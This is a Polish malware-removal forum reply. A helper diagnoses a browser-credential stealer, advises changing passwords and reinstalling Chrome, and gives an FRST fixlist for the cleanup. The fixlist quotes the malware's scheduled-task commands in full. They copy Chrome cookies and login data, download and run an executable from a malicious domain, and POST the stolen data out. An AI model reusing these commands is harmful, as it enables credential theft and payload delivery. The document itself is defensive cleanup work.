Nie wstawia sie spacji przed przecinkami, znakami zapytania itd.
Tak sie konczy bezmyslne pobieranie programow. Ta infekcja kradnie, ciastka i hasla z przegladarek (w logach widac tylko Chrome, ale nie widac calego wpisu), wiec wszystkie zmien, ktore miales zapamietane w przegladarce. Wyczysc tez wszystkie ciastka.
Najlepiej odinstaluj Chrome z kasacja profilu przegladarki.
Wykonaj Fixlist.txt dla FRST:
CloseProcesses:
HKU\S-1-5-21-2209692828-470999809-654863888-1001\...\MountPoints2: {1e0e3291-d41b-11eb-91dd-7c2a31831b06} - "I:\AutoRun.exe"
HKU\S-1-5-21-2209692828-470999809-654863888-1001\...\MountPoints2: {7cbe2981-ce9e-11eb-91dd-7c2a31831b06} - "F:\AutoRun.exe"
HKU\S-1-5-21-2209692828-470999809-654863888-1001\...\MountPoints2: {f4df9a18-74a3-11ea-90ab-aced5c3e4b52} - "I:\HiSuiteDownLoader.exe"
Startup: C:\Users\major\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SmartClock.lnk [2021-07-14] <==== UWAGA
ShortcutTarget: SmartClock.lnk -> C:\Users\major\AppData\Roaming\Smart Clock\SmartClock.exe () [Brak podpisu cyfrowego] <==== UWAGA
HKLM\SOFTWARE\Policies\Google: Ograniczenia <==== UWAGA
Task: {3E1E5F0C-00B8-4F61-BD3B-CFCDFA826E5D} - System32\Tasks\Check Volumes => C:\WINDOWS\SYSTEM32\CMD.EXE /C copy /Y /B "C:\Users\major\AppData\Local\Google\Chrome\User Data\Default\Cookies" "C:\Users\major\AppData\Local\Temp\6DT8ZDTW39" > NUL && copy /Y /B "C:\Users\major\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\major\AppData\Local\Temp\MLTGK6N8Z6" > NUL && copy /Y /B "C:\Users\major\AppData\Local\Google\Chrome\User Data\Local State" "C:\Users\major\AppData\Local\Temp\160W4OB2H9" > NUL && "C:\Users\major\AppData\Local\Temp\J5HUZHYN9L.exe"
http://1oivviovidwopopin.info/f2/5HSRZL989V.exe -s -k -o "C:\Users\major\AppData\Local\Temp\5HSRZL989V.exe" && cd C:\Users\major\AppData\Local\Temp\ && "5HSRZL989V.exe" S5RLINJDV2f2 6DT8ZDTW39 MLTGK6N8Z6 160W4OB2H9 & copy /Y /B "C:\Users\major\AppData\Local\Google\Chrome\User Data\Default\History" "C:\Users\major\AppData\Local\Temp\Q1ZDKEU5PW" > NUL && cd C:\Users\major\AppData\Local\Temp\ && "C:\Users\major\AppData\Local\Temp\J5HUZHYN9L.exe" -X POST -H "Content-type: application/octet-stream" --data @Q1ZDKEU5PW
http://1oivviovidwopopin.info/h -> /C copy /Y /B "C:\Users\major\AppData\Local\Google\Chrome\User Data\Default\Cookies" "C:\Users\major\AppData\Local\Temp\6DT8ZDTW39" > NUL && copy /Y /B "C:\Users\major\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\major\AppData\Local\Temp\MLTGK6N8Z6" > NUL && copy /Y /B "C:\Us (dane wartości zawierają 719 znaków więcej). <==== UWAGA
Task: {F174BFAA-329D-4E85-BE8C-74572D72633E} - System32\Tasks\Smart Clock => C:\Users\major\AppData\Roaming\Smart Clock\SmartClock.exe [237568 2021-07-14] () [Brak podpisu cyfrowego]
ProxyEnable: [S-1-5-21-2209692828-470999809-654863888-1001] => Proxy [funkcja włączona]
ProxyServer: [S-1-5-21-2209692828-470999809-654863888-1001] => 127.0.0.1:14683
ManualProxies: 1127.0.0.1:14683
RemoveProxy:
R2 gupdate; C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [565248 2021-07-14] (VideoLAN) [Brak podpisu cyfrowego]
S3 gupdatem; C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [565248 2021-07-14] (VideoLAN) [Brak podpisu cyfrowego]
S2 Main Service; C:\Program Files (x86)\MachinerData\DBSCardRecovery.exe [2170880 2021-07-14] () [Brak podpisu cyfrowego]
R2 SoundFlowPicker; C:\ProgramData\SoundFlowPicker\SoundFlowPicker.exe [565248 2021-07-14] (VideoLAN) [Brak podpisu cyfrowego] <==== UWAGA
2021-07-14 09:04 - 2021-07-14 11:57 - 000000000 ____D C:\ProgramData\SoundFlowPicker
2021-07-14 08:20 - 2021-07-14 08:20 - 000005418 _____ C:\WINDOWS\system32\Tasks\Check Volumes
2021-07-14 08:19 - 2021-07-14 11:43 - 013834188 _____ C:\ProgramData\Vhxwcgzi.tmp
2021-07-14 08:16 - 2021-07-14 11:56 - 000000000 ____D C:\Users\major\AppData\Roaming\Smart Clock
2021-07-14 08:16 - 2021-07-14 08:16 - 000003090 _____ C:\WINDOWS\system32\Tasks\Smart Clock
2021-07-14 08:16 - 2021-07-14 08:16 - 000000000 ____D C:\Program Files (x86)\foler
2021-07-14 08:15 - 2021-07-14 11:56 - 000000000 ____D C:\Users\major\AppData\Roaming\redblur
2021-07-14 08:15 - 2021-07-14 11:56 - 000000000 ____D C:\Program Files (x86)\MachinerData
2021-07-14 08:15 - 2021-07-14 08:15 - 000003338 _____ C:\WINDOWS\system32\Tasks\Microsoft Windows Defender Update
2021-07-14 08:15 - 2021-07-14 08:15 - 000000000 ____D C:\Users\major\AppData\Roaming\Asimen
2021-07-14 08:14 - 2021-07-14 08:14 - 000000000 ____D C:\Users\major\AppData\Roaming\Q-Dir
2021-07-14 09:08 - 2021-07-14 11:58 - 000000004 _____ () C:\ProgramData\lock.dat
2021-07-14 09:09 - 2021-07-14 12:03 - 000000004 _____ () C:\ProgramData\rc.dat
2021-07-14 09:08 - 2021-07-14 09:08 - 000000008 _____ () C:\ProgramData\ts.dat
2021-05-29 11:32 - 2021-05-29 11:33 - 147510752 _____ (Weaver Software ) C:\ProgramData\Weaver Softwaresetup.exe
Zrob skan przy pomocy mbam oraz AdwCleaner i usun to co wykryja. Po wykonaniu zamiesc nowe logi z FRST, ze skanowania.